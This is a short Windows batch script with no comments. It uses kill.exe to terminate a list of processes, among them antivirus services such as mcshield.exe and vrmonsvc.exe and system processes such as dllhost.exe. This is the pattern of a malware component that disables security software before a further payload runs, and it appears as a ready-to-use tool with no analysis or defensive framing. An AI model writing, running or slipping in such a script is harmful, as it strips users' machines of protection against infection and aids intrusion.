@echo off
kill.exe nvsvc32.exe
kill.exe vrmonsvc.exe
kill.exe vrmonNT.exe
kill.exe monsvcNT.exe
kill.exe dllhost.exe
kill.exe conime.exe
kill.exe vrres.exe
kill.exe monsysNT.exe
kill.exe fxsvc.exe
kill.exe clisvc.exe
kill.exe mspmspsv.exe
kill.exe ccap.exe
kill.exe mcshield.exe